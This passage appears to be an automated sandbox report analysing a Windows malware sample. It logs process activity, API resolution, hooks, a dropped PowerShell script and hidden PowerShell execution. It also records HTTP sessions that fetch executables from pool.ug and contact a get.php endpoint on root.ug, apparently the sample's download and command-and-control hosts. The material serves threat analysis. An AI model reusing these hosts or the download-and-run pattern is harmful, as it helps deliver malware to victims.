Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x76cb47e1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x76cb47f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x76c4eee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcesses, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcessModules, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleBaseNameW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcesses, address_out = 0x75141544	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcessModules, address_out = 0x75141408	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleBaseNameW, address_out = 0x7514152c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathA, address_out = 0x760e7804	1	Fn

Service (2)

Operation	Additional Information	Success	Count	Logfile
Open	database_name = SERVICES_ACTIVE_DATABASE		1	Fn
Open Manager	database_name = SERVICES_ACTIVE_DATABASE		1	Fn

Keyboard (249)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = KB_CODEPAGE, result_out = 437		249	Fn

System (111)

Operation	Additional Information	Count	Logfile
Sleep	duration = 100 milliseconds (0.100 seconds)	104	Fn
Get Time	type = System Time, time = 2019-05-05 18:39:43 (UTC)	1	Fn
Get Time	type = Ticks, time = 139262	1	Fn
Get Time	type = Performance Ctr, time = 20639381767	1	Fn
Get Time	type = System Time, time = 2019-05-05 18:39:44 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 20742938797	1	Fn
Get Time	type = System Time, time = 2019-05-05 18:39:45 (UTC)	1	Fn
Get Info	type = Operating System	1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Network Behavior

HTTP Sessions (7)

Information	Value
Total Data Sent	2.26 KB
Total Data Received	3.36 MB
Contacted Host Count	2
Contacted Hosts	77.123.139.189, 46.232.113.12

HTTP Session #1

Information	Value
User Agent	Microsoft Internet Explorer
Server Name	pool.ug
Server Port	80
Username	-
Password	-
Data Sent	308 bytes
Data Received	571.74 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = pool.ug, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/updatewin1.exe	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/updatewin1.exe	1	Fn
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 10240, size_out = 10240	27	Fn Data
Read Response	size = 10240, size_out = 2560	1	Fn Data
Close Session	-	1	Fn

HTTP Session #2

Information	Value
User Agent	Microsoft Internet Explorer
Server Name	pool.ug
Server Port	80
Username	-
Password	-
Data Sent	308 bytes
Data Received	571.74 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = pool.ug, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/updatewin2.exe	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/updatewin2.exe	1	Fn
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 10240, size_out = 10240	27	Fn Data
Read Response	size = 10240, size_out = 4608	1	Fn Data
Close Session	-	1	Fn

HTTP Session #3

Information	Value
User Agent	Microsoft Internet Explorer
Server Name	pool.ug
Server Port	80
Username	-
Password	-
Data Sent	308 bytes
Data Received	571.74 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = pool.ug, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/updatewin.exe	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/updatewin.exe	1	Fn
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 10240, size_out = 10240	1	Fn Data
Read Response	size = 10240	1	Fn

HTTP Session #4

Information	Value
Server Name	api.2ip.ua
Server Port	443
Username	-
Password	-
Data Sent	467 bytes
Data Received	7.19 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = https, server_name = api.2ip.ua, server_port = 443	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json	1	Fn
Read Response	size = 10240, size_out = 465	1	Fn Data
Close Session	-	1	Fn

HTTP Session #5

Information	Value
Server Name	root.ug
Server Port	80
Username	-
Password	-
Data Sent	308 bytes
Data Received	571.74 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = root.ug, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjdhfiughdhhjbdfh45687husdfhipenelop8/Asdhuage7386/get.php	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://root.ug/Asjdhfiughdhhjbdfh45687husdfhipenelop8/Asdhuage7386/get.php?pid=E3674298AE18BF5A335DF90DDA3F669F&first=true	1	Fn
Read Response	size = 1024, size_out = 257	1	Fn Data
Close Session	-	1	Fn

HTTP Session #6

Information	Value
Server Name	root.ug
Server Port	80
Username	-
Password	-
Data Sent	308 bytes
Data Received	571.74 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = root.ug, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjdhfiughdhhjbdfh45687husdfhipenelop8/Asdhuage7386/get.php	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://root.ug/Asjdhfiughdhhjbdfh45687husdfhipenelop8/Asdhuage7386/get.php?pid=E3674298AE18BF5A335DF90DDA3F669F&first=true	1	Fn
Read Response	size = 1024, size_out = 257	1	Fn Data
Close Session	-	1	Fn

HTTP Session #7

Information	Value
Server Name	root.ug
Server Port	80
Username	-
Password	-
Data Sent	308 bytes
Data Received	571.74 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = root.ug, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjdhfiughdhhjbdfh45687husdfhipenelop8/Asdhuage7386/get.php	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://root.ug/Asjdhfiughdhhjbdfh45687husdfhipenelop8/Asdhuage7386/get.php?pid=E3674298AE18BF5A335DF90DDA3F669F&first=true	1	Fn
Read Response	size = 1024, size_out = 257	1	Fn Data
Close Session	-	1	Fn

Process #6: updatewin1.exe

671

Information	Value
ID	#6
File Name	c:\users\5p5nrgjn0js halpmcxz\appdata\local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe"
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:01:33, Reason: Child Process
Unmonitor	End Time: 00:01:35, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

Information	Value
PID	0xabc
Parent PID	0xa5c (c:\users\5p5nrgjn0js halpmcxz\desktop\e0a7.tmp.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x AC0 0x AD0 0x AD4 0x AD8 0x ADC

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	Actions
updatewin1.exe	0x00400000	0x0044CFFF	Relevant Image	-	32-bit	-	... Region Actions Download Dump
buffer	0x00525000	0x00525FFF	Marked Executable	-	32-bit	-	... Region Actions Download Dump
updatewin1.exe	0x00400000	0x0044CFFF	Process Termination	-	32-bit	-	... Region Actions Download Dump

Hook Information

Type	Installer	Target	Size	Information	Actions
IAT	private_0x0000000000510000:+0x16795	104. entry of updatewin1.exe	4 bytes	kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x0000000000a70000:+0x4ff6f6	... Actions Go to Installer Region Go to Target Region

Host Behavior

File (6)

Operation	Filename	Additional Information	Count	Logfile
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe	show_window = SW_SHOW		1	Fn

Module (154)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x76c20000	2	Fn
Load	KERNEL32.dll	base_address = 0x76c20000	1	Fn
Load	ADVAPI32.dll	base_address = 0x74d40000	1	Fn
Load	SHELL32.dll	base_address = 0x75fd0000	1	Fn
Load	SHLWAPI.dll	base_address = 0x75340000	1	Fn
Load	msvcr100.dll	base_address = 0x74900000	1	Fn
Load	api-ms-win-core-synch-l1-2-0	base_address = 0x0	2	Fn
Load	kernel32	base_address = 0x0	2	Fn
Load	kernel32	base_address = 0x76c20000	2	Fn
Load	api-ms-win-core-fibers-l1-1-1	base_address = 0x0	2	Fn
Load	api-ms-win-core-localization-l1-2-1	base_address = 0x0	1	Fn
Load	api-ms-win-appmodel-runtime-l1-1-2	base_address = 0x0	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x76c20000	11	Fn
Get Handle	c:\users\5p5nrgjn0js halpmcxz\appdata\local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe	base_address = 0x400000	2	Fn
Get Handle	mscoree.dll	-	1	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe, size = 260	1	Fn
Get Filename	api-ms-win-core-localization-l1-2-1	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x76c34f2b	3	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x76c31252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x76c34208	3	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x76c3359f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77170fcb	9	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77169d35	4	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x76c5735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Module32FirstW, address_out = 0x76c579f9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x76c31856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x76c3435f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x76c3186e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x76c33519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x76c4d802	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x76c37a10	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x76c31b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x76c353c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x76c31282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x76c3469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x76c31410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessA, address_out = 0x76c31072	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x76c53102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x76c3103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x76c31136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x76c33f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x76c35a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x76c3170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x76c3192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x76c35223	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x76c57aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x76c4c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x76c31328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileA, address_out = 0x76c35444	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77171f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77163002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x76c314e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x76c317b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x76c31946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x76c33531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x76cb454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x76c52b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x76c52a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableA, address_out = 0x76c333a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetShortPathNameA, address_out = 0x76c5594d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameA, address_out = 0x76c314b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x76cd7bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x76c311a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x76c351cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x76c351e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineA, address_out = 0x76c351a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x76c35189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x76c5d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x76c34493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x76c5772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x76c387c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x76c31809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x76c35235	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x76c31725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x76c311f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x76c31450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x76c33509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeSListHead, address_out = 0x771694a4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x76c34a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x76c34d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x76c334b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x76c5d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x76c358a6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x76c311c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x771522b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77152270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x771645f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x76c349ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x76c311e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x76c314fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x76c33587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x76c334c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x76c31222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x76c3495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x76c351b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x76c34950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x76c34a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x76c3179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x7715e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x76c314c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x76c34442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileExW, address_out = 0x76c41811	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x76c354ee	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x74d5468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x74d5469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExW, address_out = 0x74d540fe	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorDacl, address_out = 0x74d5415e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitializeSecurityDescriptor, address_out = 0x74d54620	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x74d514d6	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75ff1e46	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x76055708	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = CommandLineToArgvW, address_out = 0x75fe9ee8	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendW, address_out = 0x753581ef	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsA, address_out = 0x7537ad1a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x75353248	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x7491c544	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x76c34d28	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x76cb47f1	1	Fn

System (256)

Operation	Additional Information	Count	Logfile
Get Time	type = System Time, time = 2019-05-05 18:39:49 (UTC)	2	Fn
Get Time	type = Ticks, time = 145392	1	Fn
Get Time	type = Performance Ctr, time = 21323707121	1	Fn
Get Time	type = Ticks, time = 145455	1	Fn
Get Time	type = System Time	249	Fn
Get Time	type = Performance Ctr, time = 21357834415	1	Fn
Get Info	type = Operating System	1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Process #7: updatewin1.exe

670

Information	Value
ID	#7
File Name	c:\users\5p5nrgjn0js halpmcxz\appdata\local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe" --Admin
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\
Monitor	Start Time: 00:01:34, Reason: Child Process
Unmonitor	End Time: 00:01:50, Reason: Self Terminated
Monitor Duration	00:00:16

OS Process Information

Information	Value
PID	0xae0
Parent PID	0xabc (c:\users\5p5nrgjn0js halpmcxz\appdata\local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x AE4

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	AV	YARA	Actions
buffer	0x00645000	0x00645FFF	Marked Executable	-	32-bit	-			... Region Actions Download Dump

Hook Information

Type	Installer	Target	Size	Information	Actions
IAT	private_0x0000000000630000:+0x1679d	104. entry of updatewin1.exe	4 bytes	kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x00000000008c0000:+0x6af6f6	... Actions Go to Installer Region Go to Target Region

Dropped Files

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1	49 bytes	MD5: f972c62f986b5ed49ad7713d93bf6c9f SHA1: 4e157002bdb97e9526ab97bfafbf7c67e1d1efbf SHA256: b47f85974a7ec2fd5aa82d52f08eb0f6cea7e596a98dd29e8b85b5c37beca0a8 SSDeep: 3:uIHeGAFcX5wTnl:/eGgHTl		... File Actions Show Properties Download

Host Behavior

File (8)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1	size = 49	1	Fn Data

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	powershell	os_pid = 0xaec, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE		1	Fn

Module (150)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x76c20000	2	Fn
Load	KERNEL32.dll	base_address = 0x76c20000	1	Fn
Load	ADVAPI32.dll	base_address = 0x74d40000	1	Fn
Load	SHELL32.dll	base_address = 0x75fd0000	1	Fn
Load	SHLWAPI.dll	base_address = 0x75340000	1	Fn
Load	msvcr100.dll	base_address = 0x74900000	1	Fn
Load	api-ms-win-core-synch-l1-2-0	base_address = 0x0	2	Fn
Load	kernel32	base_address = 0x0	2	Fn
Load	kernel32	base_address = 0x76c20000	2	Fn
Load	api-ms-win-core-fibers-l1-1-1	base_address = 0x0	2	Fn
Load	api-ms-win-core-localization-l1-2-1	base_address = 0x0	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x76c20000	11	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe, size = 260	1	Fn
Get Filename	api-ms-win-core-localization-l1-2-1	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x76c34f2b	3	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x76c31252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x76c34208	3	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x76c3359f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77170fcb	9	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77169d35	4	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x76c5735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Module32FirstW, address_out = 0x76c579f9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x76c31856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x76c3435f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x76c3186e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x76c33519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x76c4d802	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x76c37a10	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x76c31b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x76c353c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x76c31282	1	Fn
